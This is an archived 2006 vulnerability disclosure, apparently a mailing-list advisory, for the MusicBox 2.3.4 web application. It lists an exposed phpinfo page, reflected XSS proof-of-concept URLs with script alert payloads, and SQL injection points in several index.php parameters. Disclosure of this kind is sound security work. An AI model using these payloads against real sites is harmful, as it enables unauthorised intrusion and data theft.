Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) SQuery v.x (devi.php) (armygame.php) Remote File Inclusion [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities XSS в Devium CMS 1.5 SQL-Injection in Shop-Script PRO & Shop-Script Premium all version From:securityconnection_(at)_gmail.com <securityconnection_(at)_gmail.com> Date:25.07.2006Subject:MusicBox <= 2.3.4 XSS SQL injection VulnerabilityMusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)< /script>&page=0 http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTe st/)</script>&page=0 http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest /)</script>&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type=<script>alert (/EllipsisSecurityTest/)</script> http://www.target.xx/index.php?action=top&show=<script>alert(/Ellip sisSecurityTest/)</script>&type=Artists ------------- SQL injection ------------- http://www.target.xx/index.php?term=hit&in=song&action=search&start=` [SQL] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
SQuery v.x (devi.php) (armygame.php) Remote File Inclusion
[MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities
XSS в Devium CMS 1.5
SQL-Injection in Shop-Script PRO & Shop-Script Premium all version
